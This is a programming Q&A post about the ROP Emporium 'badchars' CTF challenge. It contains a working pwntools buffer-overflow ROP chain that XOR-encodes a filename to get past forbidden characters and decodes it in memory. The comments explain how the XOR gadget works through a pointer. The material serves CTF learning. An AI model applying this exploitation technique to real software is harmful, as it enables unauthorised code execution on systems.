# Can't understand XOR behaviour

Tags: python, assembly, x86-64, buffer-overflow, exploit

I've been trying to solve the badchars CTF from ROP Emporium and since I've struggled a bit on this one I decided to search for writeups but I am unable to understand how a piece of code acts. Here is a script that works:

```
from pwn import *

elf = ELF("./badchars")
p = elf.process()

offset = 40
pop_r12131415 = 0x000000000040069c
mov_r12to13 = 0x0000000000400634
func = 0x400510
pop_rdi = 0x00000000004006a3
writehere = 0x00601038 
flag = 0x767a762c65636e64
xor_r14_r15 = 0x0000000000400628
pop_r14_r15 = 0x00000000004006a0


rop = b"A"*offset + p64(pop_r12131415) + p64(flag) + p64(writehere) + p64(2) + p64(2) + p64(mov_r12to13) 

for i in range(8):
    rop += p64(pop_r14_r15)
    rop += p64(2) + p64(writehere + i)
    rop += p64(xor_r14_r15)


rop += p64(pop_rdi)
rop += p64(writehere) 
rop += p64(func)


p.recv()
p.sendline(rop)
p.interactive()
```

I've been able to understand everything until the for loop. I thought the for loop was decrypting the XORed input I've put into "writehere". Although it seems like it does that, I can't understand how in the end we insert "writehere" into rdi as the argument because I do not see anything in the for loop that would change what is in "writehere". Am I missing something within the for loop?

Note: func basically prints the argument inside, writehere is a readable and writable address, flag is "flag.txt" that has been XORed with key 2 and reversed.  `xor_r14_r15` is `xor byte ptr [r15], r14b` ; `ret`.  `pop_r14_r15` is `pop r14` ; `pop r15` ; `ret`

Comment: [Don't post images of code please](https://idownvotedbecau.se/imageofcode).

Comment: `pop_r14_r15` will put `2` into `r14` and `writehere + i` into `r15` due to the following `p64(2) + p64(writehere + i)`. Then the `xor_r14_r15` will `xor byte ptr [r15], r14b` which then modifies the contents of `writehere + i` in place.

Comment: But doesn't ```xor byte ptr [r15], r14b``` change what is written in r15 (which is writehere + i) whereas the original writehere stays the same and the code ```rop += p64(writehere)``` uses original writehere location?

Comment: It's an indirection. It changes the original value in memory. It does not change `r15` which is an address. It's doing `writehere[i] ^= 2`.

Comment: It now makes sense that it changes via an indirection, although I am surprised that you stated it does not change the value in `r15` register because I've seen it being used for changing the value in `r15` as well, such as XORing `r12` and `r13` where `r12` is 0 so `r13` can be directly written into `r12` address.

Comment: The `pop_r14_r15` changes `r15` (and `r14`). The `xor_r14_r15` does not change either.